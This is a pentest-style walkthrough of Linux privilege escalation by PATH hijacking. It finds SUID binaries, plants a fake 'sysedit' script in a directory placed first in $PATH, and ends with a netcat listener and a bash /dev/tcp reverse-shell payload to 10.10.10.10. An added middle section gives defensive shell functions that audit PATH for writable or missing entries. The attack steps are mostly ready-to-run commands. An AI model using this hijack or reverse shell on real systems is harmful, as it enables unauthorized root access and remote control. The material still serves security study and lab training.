# Writable $PATH

## Path Hijacking

### Identify the SUID file

```bash
find / -perm -4000 2>/dev/null
```

For example, suppose we found a SUID file called `/usr/bin/sysedit`, and this binary is invoked by its bare name (not by an absolute path) from a task or script that we control or can execute.

### Create a file with malicious content

We need to create a file with the same name as the SUID file found previously:

```bash
mkdir /tmp/.my-things
cd /tmp/.my-things   # or `cd !$` in an interactive shell
echo "#!/bin/bash" > sysedit
echo "id > /tmp/.my-things/id.txt" >> sysedit
chmod +x sysedit     # must be executable, otherwise the PATH lookup skips it
```

### Update the $PATH variable

```bash
echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
```

```bash
export PATH=/tmp/.my-things:$PATH
```

```bash
echo $PATH
# /tmp/.my-things:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
```

With that, our directory (with the malicious file inside) becomes the first entry the system searches, so it is the `sysedit` that gets found when the name is invoked.

Now we trigger the task or service that calls that file again. Instead of the normal execution, we see:

```bash
ls /tmp/.my-things
# id.txt
```
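As an added example (not part of the original page), the following POSIX shell functions audit a PATH value for the precondition this hijack relies on, a missing or caller-writable directory searched before the system directories, and show which file a bare command name resolves to under a given PATH. The directory and command names in the usage lines are constructed.

```shell
#!/bin/sh
# Added example, not from the original page. Audits a PATH value for
# entries an attacker could populate, and resolves a bare command name
# the way the shell does (first matching directory wins).

# Print one line per risky PATH entry; return 1 if any were found, else 0.
audit_path() {
    rest="$1:"
    risky=0
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"
        rest="${rest#*:}"
        # An empty entry (leading, trailing or doubled ':') means "."
        [ -z "$dir" ] && dir="."
        if [ ! -d "$dir" ]; then
            printf 'MISSING  %s\n' "$dir"   # whoever can create it owns the slot
            risky=1
        elif [ -w "$dir" ]; then
            printf 'WRITABLE %s\n' "$dir"   # a file dropped here shadows later entries
            risky=1
        fi
    done
    return "$risky"
}

# Print the file a bare command name resolves to under the given PATH;
# return 1 if no directory in it holds an executable of that name.
resolve_cmd() {
    name="$1"
    rest="$2:"
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"
        rest="${rest#*:}"
        [ -z "$dir" ] && dir="."
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    return 1
}

# Usage: the caller's PATH versus the fixed PATH a privileged script should
# set itself (the safe pattern: no user-controlled directory in front).
audit_path "$PATH" || echo "PATH contains hijackable entries"
audit_path "/usr/sbin:/usr/bin:/sbin:/bin" && echo "fixed PATH looks clean"
```

Running `audit_path` on the PATH from the walkthrough above flags `/tmp/.my-things` as WRITABLE, and `resolve_cmd sysedit "$PATH"` then points at the planted file rather than `/usr/bin/sysedit`.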

### If we want a Reverse Shell

On the attack machine, listen on a port:

```bash
nc -lnvp 4460
```

Now create the file with a connection back to the attacker's listener:

```bash
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4460 0>&1'" > sysedit
```
